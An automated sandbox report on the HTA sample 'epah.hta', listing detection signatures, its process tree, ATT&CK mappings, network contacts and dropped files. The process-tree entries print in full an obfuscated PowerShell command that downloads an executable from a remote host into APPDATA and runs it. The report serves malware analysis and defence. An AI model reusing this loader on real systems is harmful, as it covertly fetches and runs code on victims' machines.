Edit tour

Windows Analysis Report
epah.hta

Overview

General Information

Sample Name:	epah.hta
Analysis ID:	1324713
MD5:	bbe66f8d391f2e0b587cf72d29c35421
SHA1:	917ec84e2cc79f7f7a2063f19dbc699bbcc8f615
SHA256:	a4682b56616e4e214486436c7efac3da473798f79b2a359b50c3fc97fb74a655
Tags:	hta
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Suspicious powershell command line found

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Searches for the Microsoft Outlook file path

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

JA3 SSL client fingerprint seen in connection with other malware

HTTP GET or POST without a user agent

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6764 cmdline: mshta.exe "C:\Users\user\Desktop\epah.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 6928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LxGUVY($ULTnO, $cKfTKhE){[IO.File]::WriteAllBytes($ULTnO, $cKfTKhE)};function ZFTHtJe($ULTnO){if($ULTnO.EndsWith((afdAOkcp @(31653,31707,31715,31715))) -eq $True){Start-Process (afdAOkcp @(31721,31724,31717,31707,31715,31715,31658,31657,31653,31708,31727,31708)) $ULTnO}else{Start-Process $ULTnO}};function raCMRIKEt($myHoR){$CSAPcdTh = New-Object (afdAOkcp @(31685,31708,31723,31653,31694,31708,31705,31674,31715,31712,31708,31717,31723));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cKfTKhE = $CSAPcdTh.DownloadData($myHoR);return $cKfTKhE};function afdAOkcp($SsayQt){$iUQgIbjjg=31607;$WnZmplQpi=$Null;foreach($geCfq in $SsayQt){$WnZmplQpi+=[char]($geCfq-$iUQgIbjjg)};return $WnZmplQpi};function WEYxOo(){$hKmeWVT = $env:APPDATA + '\';$LUFdtejyB = raCMRIKEt (afdAOkcp @(31711,31723,31723,31719,31722,31665,31654,31654,31723,31711,31708,31653,31708,31704,31721,31723,31711,31653,31715,31712,31654,31733,31722,31710,31723,31704,31723,31711,31704,31716,31654,31719,31724,31723,31723,31728,31654,31715,31704,31723,31708,31722,31723,31654,31726,31661,31659,31654,31719,31724,31723,31723,31728,31653,31708,31727,31708));$sUEvB = $hKmeWVT + 'putty.exe';LxGUVY $sUEvB $LUFdtejyB;ZFTHtJe $sUEvB;;;;}WEYxOo; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 6928	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2f586:$b1: ::WriteAllBytes( 0x3023a:$b1: ::WriteAllBytes( 0x30773:$b1: ::WriteAllBytes( 0x4a108:$b1: ::WriteAllBytes( 0xc3593:$b1: ::WriteAllBytes( 0xc4b17:$b1: ::WriteAllBytes( 0xc93d5:$b1: ::WriteAllBytes( 0xcd147:$b1: ::WriteAllBytes( 0xcd52b:$b1: ::WriteAllBytes( 0xe952f:$b1: ::WriteAllBytes( 0xee017:$b1: ::WriteAllBytes( 0xee51c:$b1: ::WriteAllBytes( 0x10ff13:$b1: ::WriteAllBytes( 0x1179ca:$b1: ::WriteAllBytes( 0x12cf1b:$b1: ::WriteAllBytes( 0x12d420:$b1: ::WriteAllBytes( 0x193051:$b1: ::WriteAllBytes( 0x193584:$b1: ::WriteAllBytes( 0x194466:$b1: ::WriteAllBytes( 0x194b86:$b1: ::WriteAllBytes( 0x197925:$b1: ::WriteAllBytes(

Other

Source	Rule	Description	Author	Strings
amsi32_6928.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x89:$b1: ::WriteAllBytes( 0xa1b8:$s1: -join 0x3964:$s4: += 0x3a26:$s4: += 0x7c4d:$s4: += 0x9d6a:$s4: += 0xa054:$s4: += 0xa19a:$s4: += 0xb933:$s4: += 0xb9b3:$s4: += 0xba79:$s4: += 0xbaf9:$s4: += 0xbccf:$s4: += 0xbd53:$s4: += 0x10a:$e4: Start-Process 0x17a:$e4: Start-Process 0xc4d1:$e4: Get-WmiObject 0xc6c0:$e4: Get-Process 0xc718:$e4: Start-Process

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LxGUVY($ULTnO, $cKfTKhE){[IO.File]::WriteAllBytes($ULTnO, $cKfTKhE)};function ZFTHtJe($ULTnO){if($ULTnO.EndsWith((afdAOkcp @(31653,31707,31715,31715))) -eq $True){Start-Process (afdAOkcp @(31721,31724,31717,31707,31715,31715,31658,31657,31653,31708,31727,31708)) $ULTnO}else{Start-Process $ULTnO}};function raCMRIKEt($myHoR){$CSAPcdTh = New-Object (afdAOkcp @(31685,31708,31723,31653,31694,31708,31705,31674,31715,31712,31708,31717,31723));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cKfTKhE = $CSAPcdTh.DownloadData($myHoR);return $cKfTKhE};function afdAOkcp($SsayQt){$iUQgIbjjg=31607;$WnZmplQpi=$Null;foreach($geCfq in $SsayQt){$WnZmplQpi+=[char]($geCfq-$iUQgIbjjg)};return $WnZmplQpi};function WEYxOo(){$hKmeWVT = $env:APPDATA + '\';$LUFdtejyB = raCMRIKEt (afdAOkcp @(31711,31723,31723,31719,31722,31665,31654,31654,31723,31711,31708,31653,31708,31704,31721,31723,31711,31653,31715,31712,31654,31733,31722,31710,31723,31704,31723,31711,31704,31716,31654,31719,31724,31723,31723,31728,31654,31715,31704,31723,31708,31722,31723,31654,31726,31661,31659,31654,31719,31724,31723,31723,31728,31653,31708,31727,31708));$sUEvB = $hKmeWVT + 'putty.exe';LxGUVY $sUEvB $LUFdtejyB;ZFTHtJe $sUEvB;;;;}WEYxOo;

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Command and Scripting Interpreter	Path Interception	11 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.micro	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
the.earth.li	93.93.131.124	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	powershell.exe, 00000001.00000002.1674324075.0000000007A80000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1670355706.00000000050F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000001.00000002.1670355706.00000000057C5000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://the.earth.li/~sgtatham/putty/0.79/w64/putty.exe	powershell.exe, 00000001.00000002.1670355706.0000000005364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1670355706.000000000534E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1670355706.0000000005368000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://the.earth.li	powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1670355706.00000000050F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
93.93.131.124	the.earth.li	United Kingdom		44684	MYTHICMythicBeastsLtdGB	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1324713
Start date and time:	2023-10-12 15:28:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 2m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	epah.hta
Detection:	MAL
Classification:	mal60.winHTA@4/3@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 35 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .hta Stop behavior analysis, all processes terminated

Warnings

Execution Graph export aborted for target powershell.exe, PID 6928 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: epah.hta

Simulations

Behavior and APIs

Time	Type	Description
15:28:57	API Interceptor	24x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
93.93.131.124	a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta	Get hash	malicious	Unknown	Browse	the.earth.li/~sgtatham/putty/0.63/x86/putty.exe
	doc.doc	Get hash	malicious	Unknown	Browse	the.earth.li/~sgtatham/putty/latest/w64/putty.exe
	lmfao.doc	Get hash	malicious	Unknown	Browse	the.earth.li/~sgtatham/putty/0.63/x86/pscp.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
the.earth.li	a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta	Get hash	malicious	Unknown	Browse	93.93.131.124
	client_1.hta	Get hash	malicious	Unknown	Browse	93.93.131.124
	client_3.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	Informazion.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	827837hj.xls	Get hash	malicious	Unknown	Browse	93.93.131.124
	doc.doc	Get hash	malicious	Unknown	Browse	93.93.131.124
	https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msi	Get hash	malicious	Unknown	Browse	93.93.131.124
	1mixELaybY.exe	Get hash	malicious	vkeylogger	Browse	93.93.131.124
	smphost.dll	Get hash	malicious	Unknown	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	Microsoft Excel.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	Microsoft Excel.xlsm	Get hash	malicious	Unknown	Browse	93.93.131.124
	lmfao.doc	Get hash	malicious	Unknown	Browse	93.93.131.124
	YOeg64zDX4.exe	Get hash	malicious	AZORult	Browse	93.93.131.124
	payload.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	do7ZLDDsHX.xls	Get hash	malicious	Unknown	Browse	93.93.131.124
	m.doc	Get hash	malicious		Browse	46.43.34.31
	m.doc	Get hash	malicious		Browse	46.43.34.31

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MYTHICMythicBeastsLtdGB	a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta	Get hash	malicious	Unknown	Browse	93.93.131.124
	client_1.hta	Get hash	malicious	Unknown	Browse	93.93.131.124
	client_3.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	Informazion.vbs	Get hash	malicious	Unknown	Browse	93.93.131.124
	827837hj.xls	Get hash	malicious	Unknown	Browse	93.93.131.124
	7XlWWSA2LU.dll	Get hash	malicious	Wannacry	Browse	93.93.132.33
	section_228_highways_agreement 34377.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	dfas_telework_agreement 20731.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	private_child_support_agreement_template 17845.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	making_a_contract_legally_binding_30040.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	illegalargumentexception_comparison_method_violates_its_general_contra 70051.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	electrical_contractor_agreement_template 5445.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	gootloader_stage1.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	difference_between_service_contract_and_employment_contract 98116.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	print_scheduling_agreement_sap 4874.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	chase_heloc_subordination_form 86327.js	Get hash	malicious	Unknown	Browse	46.235.226.209
	doc.doc	Get hash	malicious	Unknown	Browse	93.93.131.124
	https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msi	Get hash	malicious	Unknown	Browse	93.93.131.124
	1mixELaybY.exe	Get hash	malicious	vkeylogger	Browse	93.93.131.124
	smphost.dll	Get hash	malicious	Unknown	Browse	93.93.131.124

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SOA.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	soa-zip.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	nicko.vbs	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	Remittance_slip_060223.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	siparis_46224199.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	Delivery.pdf.lnk	Get hash	malicious	Unknown	Browse	93.93.131.124
	Certificado FNMT.exe	Get hash	malicious	GuLoader	Browse	93.93.131.124
	SecuriteInfo.com.Trojan.PackedNET.2076.3530.28070.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	GqIwdAmZpguIocU.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	msjO.hta	Get hash	malicious	Quasar	Browse	93.93.131.124
	SXcWYkmW62.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	n3lONGKKwi.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	EXcl0UcgOP.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	BQJmVoZzyL.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	n3lONGKKwi.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	BQJmVoZzyL.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	DiionPQ6HA.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	DiionPQ6HA.exe	Get hash	malicious	Unknown	Browse	93.93.131.124
	ia2cJub3HM.exe	Get hash	malicious	AgentTesla	Browse	93.93.131.124
	YQakDiOpAx.exe	Get hash	malicious	Unknown	Browse	93.93.131.124

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1308
Entropy (8bit):	5.392183256298089
Encrypted:	false
SSDEEP:	24:3JWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NK3R8q9r8HL:ZWSU4xymI4RfoUeW+mZ9tK8NWR8q9w
MD5:	CE8D3BF140050F0C90874D2DEE813B0F
SHA1:	97236B124B00A9AFF7BB2F64E8AF3509077EA3B6
SHA-256:	92079E37FD12D18F16DBC434E4FA98D2826ED5E369A67452694DC5EDCCDABA5A
SHA-512:	7B4C7A25A6FB2D31C9667F58A5B3BEDAB8AD5C80D8789AA635B4B2896888D54276D1FF3F8FC4C12B09FF8E22CA2C7438E6C6047FC7DB38E0F9E69A96AB03B555
Malicious:	false
Reputation:	low
Preview:	@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_450niw1h.chz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysfaqfb2.ojm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (7765)
Entropy (8bit):	5.9048127061837
TrID:	Visual Basic Script (13500/0) 27.83% HyperText Markup Language (12001/1) 24.74% HyperText Markup Language (12001/1) 24.74% HyperText Markup Language (11001/1) 22.68%
File name:	epah.hta
File size:	55'638 bytes
MD5:	bbe66f8d391f2e0b587cf72d29c35421
SHA1:	917ec84e2cc79f7f7a2063f19dbc699bbcc8f615
SHA256:	a4682b56616e4e214486436c7efac3da473798f79b2a359b50c3fc97fb74a655
SHA512:	487c3157b4e960efd804e8ffa902126a7052a419cf488d532ee92c3f3943eab35c5cab5095986496e58b6a81a2c980fa7e3121df6e09d7a0519a4dfa67628969
SSDEEP:	768:dB9hrg5TLEgQuTxYDY9Aw0JNNuKhqXt3I5SZiikVWAE4yggI8tL8U8CHWP955:n910ow0JFgt3I5SZCE4yggI6L8U6J
TLSH:	DF43B45E3E853D30B55E59E0880BC47E25B16A31064966E42781EFE23C718AEF7E7C0E
File Content Preview:	<html xmlns="http://www.w3.org/1999/xhtml">.<head>.<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />.<script language="VBScript">.Function kaOxlFjQuNkiRnmXR().Dim gOjaUudlKAzWgVJsa.gOjaUudlKAzWgVJsa = 33445.Dim GTDwvVqXkXvuYfPATn.GTDwv

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2023 15:28:59.610093117 CEST	49741	443	192.168.2.4	93.93.131.124
Oct 12, 2023 15:28:59.610181093 CEST	443	49741	93.93.131.124	192.168.2.4
Oct 12, 2023 15:28:59.610277891 CEST	49741	443	192.168.2.4	93.93.131.124
Oct 12, 2023 15:28:59.618633032 CEST	49741	443	192.168.2.4	93.93.131.124
Oct 12, 2023 15:28:59.618673086 CEST	443	49741	93.93.131.124	192.168.2.4
Oct 12, 2023 15:29:00.264429092 CEST	443	49741	93.93.131.124	192.168.2.4
Oct 12, 2023 15:29:00.264530897 CEST	49741	443	192.168.2.4	93.93.131.124
Oct 12, 2023 15:29:00.269234896 CEST	49741	443	192.168.2.4	93.93.131.124
Oct 12, 2023 15:29:00.269246101 CEST	443	49741	93.93.131.124	192.168.2.4
Oct 12, 2023 15:29:00.269613028 CEST	443	49741	93.93.131.124	192.168.2.4
Oct 12, 2023 15:29:00.309737921 CEST	49741	443	192.168.2.4	93.93.131.124
Oct 12, 2023 15:29:00.335205078 CEST	49741	443	192.168.2.4	93.93.131.124
Oct 12, 2023 15:29:00.378451109 CEST	443	49741	93.93.131.124	192.168.2.4
Oct 12, 2023 15:29:00.851692915 CEST	443	49741	93.93.131.124	192.168.2.4
Oct 12, 2023 15:29:00.851811886 CEST	443	49741	93.93.131.124	192.168.2.4
Oct 12, 2023 15:29:00.851980925 CEST	49741	443	192.168.2.4	93.93.131.124
Oct 12, 2023 15:29:00.881987095 CEST	49741	443	192.168.2.4	93.93.131.124

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2023 15:28:59.109904051 CEST	62562	53	192.168.2.4	1.1.1.1
Oct 12, 2023 15:28:59.603904963 CEST	53	62562	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 12, 2023 15:28:59.109904051 CEST	192.168.2.4	1.1.1.1	0xbfbe	Standard query (0)	the.earth.li	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 12, 2023 15:28:59.603904963 CEST	1.1.1.1	192.168.2.4	0xbfbe	No error (0)	the.earth.li		93.93.131.124	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

the.earth.li

HTTPS Proxied Packets

